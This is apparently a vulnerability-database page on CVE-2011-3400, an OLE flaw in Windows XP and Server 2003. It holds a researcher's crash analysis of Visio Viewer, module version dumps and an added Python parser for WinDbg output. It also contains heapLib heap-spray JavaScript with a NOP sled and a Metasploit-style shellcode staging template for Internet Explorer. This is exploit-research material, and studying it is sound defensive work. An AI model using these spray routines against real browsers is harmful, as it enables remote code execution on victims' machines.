9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka “OLE Property Vulnerability.”
Recent assessments:
wchen-r7 at September 12, 2019 6:08pm UTC reported:
Embed a Visio Viewer In a Web Page: <http://msdn.microsoft.com/en-us/library/aa168474(v=office.11).aspx>
Crash Windows XP SP3 Visio Viewer 2010
(9b8.9bc): Unknown exception - code e0000002 (first chance)
(9b8.9bc): C++ EH exception - code e06d7363 (first chance)
(9b8.9bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001c12b8 ebx=00000000 ecx=00400035 edx=00000000 esi=001e6498 edi=029c4240
eip=0e000000 esp=00136cf4 ebp=00136d24 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
0e000000 ?? ???
0:000> !exchain
TRIAGER: Could not open triage file : C:\Program Files\Windows Kits\8.0\Debuggers\x86\triage\oca.ini, error 2
TRIAGER: Could not open triage file : C:\Program Files\Windows Kits\8.0\Debuggers\x86\winxp\triage.ini, error 2
TRIAGER: Could not open triage file : C:\Program Files\Windows Kits\8.0\Debuggers\x86\triage\user.ini, error 2
00136db4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\MICROS~2\Office14\VVIEWER.DLL -
VVIEWER!GetAllocCounters+132fc0 (602ae0fd)
00136de0: VVIEWER!GetAllocCounters+1332f5 (602ae432)
00136e2c: VVIEWER!GetAllocCounters+1311ba (602ac2f7)
00136ecc: VVIEWER!GetAllocCounters+1309e1 (602abb1e)
00136f40: VVIEWER!GetAllocCounters+130f7c (602ac0b9)
001381f4: VVIEWER!GetAllocCounters+11cf02 (6029803f)
00138228: VVIEWER!GetAllocCounters+11baee (60296c2b)
0013eae0: USER32!_except_handler3+0 (7e44048f)
CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)
0013eb40: USER32!_except_handler3+0 (7e44048f)
0013ee5c: BROWSEUI!_except_handler3+0 (76001b21)
CRT scope 0, filter: BROWSEUI!BrowserProtectedThreadProc+56 (75fa5394)
func: BROWSEUI!BrowserProtectedThreadProc+72 (75fa53b5)
0013ffe0: kernel32!_except_handler3+0 (7c839ac0)
CRT scope 0, filter: kernel32!BaseProcessStart+29 (7c843882)
func: kernel32!BaseProcessStart+3a (7c843898)
!heap addresses come on!!!!
js_pivot = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
heap_obj.debugHeap(true);
for (var i=1; i < 0x1e0; i++) {
heap_obj.alloc(block);
}
heap_obj.debugHeap(false);
JS
heap spray to populate 200020
<script>
var heap_obj = new heapLib.ie(0x20000);
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x80000) nops += nops;
var shellcode = nops.substring(0, 0x800);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x1000-6)/2);
alert(1);
heap_obj.gc();
heap_obj.debugHeap(true);
for (var i=1; i < 0x1E; i++) {
heap_obj.alloc(block);
}
heap_obj.debugHeap(false);
alert(2);
</script>
Reliable UNICODE Pointers to the heap could be on the mapping of:
xpsp2res.dll re5.1.2600.5512
start end module name
01a30000 01cf5000 xpsp2res (deferred)
About Internet Explorer 6, before update
0:010> lmv m IEXPLORE
start end module name
00400000 00419000 IEXPLORE (deferred)
Image path: C:\Program Files\Internet Explorer\IEXPLORE.EXE
Image name: IEXPLORE.EXE
Timestamp: Sun Apr 13 20:34:13 2008 (48025225)
CheckSum: 00017A61
ImageSize: 00019000
File version: 6.0.2900.5512
Product version: 6.0.2900.5512
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Microsoft Corporation
ProductName: Microsoft® Windows® Operating System
InternalName: iexplore
OriginalFilename: IEXPLORE.EXE
ProductVersion: 6.00.2900.5512
FileVersion: 6.00.2900.5512 (xpsp.080413-2105)
FileDescription: Internet Explorer
LegalCopyright: © Microsoft Corporation. All rights reserved.
After update
0:018> lmv m IEXPLORE
start end module name
00400000 00419000 IEXPLORE (deferred)
Image path: C:\Program Files\Internet Explorer\IEXPLORE.EXE
Image name: IEXPLORE.EXE
Timestamp: Sun Apr 13 20:34:13 2008 (48025225)
CheckSum: 00017A61
ImageSize: 00019000
File version: 6.0.2900.5512
Product version: 6.0.2900.5512
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Microsoft Corporation
ProductName: Microsoft® Windows® Operating System
InternalName: iexplore
OriginalFilename: IEXPLORE.EXE
ProductVersion: 6.00.2900.5512
FileVersion: 6.00.2900.5512 (xpsp.080413-2105)
FileDescription: Internet Explorer
LegalCopyright: © Microsoft Corporation. All rights reserved.
After updates:
Internet Explorer 7
0:014> lmv m IEFRAME
start end module name
009c0000 00f89000 IEFRAME (deferred)
Image path: C:\WINDOWS\system32\IEFRAME.dll
Image name: IEFRAME.dll
Timestamp: Tue Aug 14 03:54:09 2007 (46C10B41)
CheckSum: 005CA70C
ImageSize: 005C9000
File version: 7.0.5730.13
Product version: 7.0.5730.13
File flags: 8 (Mask 3F) Private
File OS: 40004 NT Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Microsoft Corporation
ProductName: Windows® Internet Explorer
InternalName: IEFRAME.DLL
OriginalFilename: IEFRAME.DLL
ProductVersion: 7.00.5730.13
FileVersion: 7.00.5730.13 (longhorn(wmbla).070711-1130)
FileDescription: Internet Explorer
LegalCopyright: © Microsoft Corporation. All rights reserved.
Assessed Attacker Value: 0
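The assessment's before/after `lmv m IEXPLORE` dumps show identical timestamps, checksums and file versions, so the browser executable itself says nothing about whether the update is installed; only the component the bulletin actually replaces will change. The Python below is an added example, not code from the assessment above or from Microsoft tooling: it parses WinDbg `lmv m <module>` output into a dict and compares the version-resource fields of two captures. The IEXPLORE samples are copied from the assessment; the third dump is constructed with made-up values to show what a real change looks like.

```python
"""
Parse WinDbg `lmv m <module>` output and compare module metadata captured
before and after a patch. Added example; not part of the AttackerKB post.
"""
import re

# "00400000 00419000 IEXPLORE (deferred)" -> start, end, module, symbol state
HEADER_RE = re.compile(r"^([0-9a-fA-F]{8})\s+([0-9a-fA-F]{8})\s+(\S+)\s+\((\w+)\)$")
# "File version: 6.0.2900.5512" -> key, value (the value may itself contain colons)
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?):\s+(.*)$")


def parse_lmv(text):
    """Return the module's load range and version-resource fields as a dict."""
    info = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("0:") or line.startswith("start "):
            continue  # debugger prompt and the "start end module name" header
        h = HEADER_RE.match(line)
        if h:
            info["start"], info["end"], info["module"], info["symbols"] = h.groups()
            continue
        f = FIELD_RE.match(line)
        if f:
            info[f.group(1)] = f.group(2).strip()
    return info


# Copied from the assessment above (IE 6 on XP SP3); only the prompt differs.
IEXPLORE_BEFORE = """\
0:010> lmv m IEXPLORE
start end module name
00400000 00419000 IEXPLORE (deferred)
    Image path: C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE
    Timestamp: Sun Apr 13 20:34:13 2008 (48025225)
    CheckSum: 00017A61
    ImageSize: 00019000
    File version: 6.0.2900.5512
"""
IEXPLORE_AFTER = IEXPLORE_BEFORE.replace("0:010>", "0:018>")

# Constructed dump with made-up timestamp, checksum and version (not a real build),
# to show the output when the binary really was replaced.
IEXPLORE_HYPOTHETICAL = """\
0:012> lmv m IEXPLORE
start end module name
00400000 00419000 IEXPLORE (deferred)
    Image path: C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE
    Timestamp: Mon Jan 01 00:00:00 2011 (4D1E0000)
    CheckSum: 00000000
    ImageSize: 00019000
    File version: 6.0.2900.9999
"""

# Fields that change when a binary is actually replaced by an update.
COMPARE_KEYS = ("Timestamp", "CheckSum", "ImageSize", "File version")


def diff_metadata(before, after, keys=COMPARE_KEYS):
    """Map each key whose value differs between two parsed dumps to (old, new)."""
    return {k: (before.get(k), after.get(k)) for k in keys if before.get(k) != after.get(k)}


def update_evidence(before_text, after_text):
    """'unchanged' means this binary is no evidence either way about the update."""
    b, a = parse_lmv(before_text), parse_lmv(after_text)
    if b.get("module") != a.get("module"):
        raise ValueError("dumps are for different modules")
    return "changed" if diff_metadata(b, a) else "unchanged"


if __name__ == "__main__":
    print("IEXPLORE before vs after:", update_evidence(IEXPLORE_BEFORE, IEXPLORE_AFTER))
    changed = diff_metadata(parse_lmv(IEXPLORE_BEFORE), parse_lmv(IEXPLORE_HYPOTHETICAL))
    for key, (old, new) in changed.items():
        print(f"  {key}: {old} -> {new}")
```

When verifying a bulletin on a live box, capture `lmv` for the module the bulletin's file list names rather than the host process; an unchanged host executable, as seen here, is the expected result and not a sign the update failed.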
aluigi.org/adv/ole32_1-adv.txt
poi.apache.org/hpsf/thumbnails.html
www.us-cert.gov/cas/techalerts/TA11-347A.html
www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3400
docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-093
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14668